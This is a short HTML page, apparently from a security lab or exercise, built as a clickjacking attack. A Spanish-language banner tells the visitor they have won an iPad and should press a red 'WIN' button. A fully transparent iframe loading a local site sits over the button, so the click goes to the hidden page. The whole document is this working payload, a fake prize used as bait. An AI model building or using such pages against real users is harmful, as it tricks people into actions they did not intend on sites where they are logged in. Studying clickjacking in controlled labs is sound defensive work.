<div style="position: absolute;font-size:25px; left: 10px; top: 10px;">FELICIDADES, ERES EL VISITANTE 100000000000000000000000 Y POR ESO TE VAMOS A REGALAR UN IPAD, APRETA EL BOTON "WIN"</div>
<div style="position: absolute; left: 200px; top: 50px;">
    <img src="https://store.storeimages.cdn-apple.com/4662/as-images.apple.com/is/image/AppleInc/aos/published/images/m/ob/mobile/ipad/mobile-ipad-mini-4-hero-2015_GEO_ES?wid=1200&hei=630&fmt=jpeg&qlt=95&op_sharpen=0&resMode=bicub&op_usm=0.5,0.5,0,0&iccEmbed=0&layer=comp&.v=1507222556671" width="250">
</div>
<div style="position: absolute; left: 230px; top: 260px; color: red; font-weight: bold;">>> WIN <<</div>
<iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://localhost:6798/"></iframe>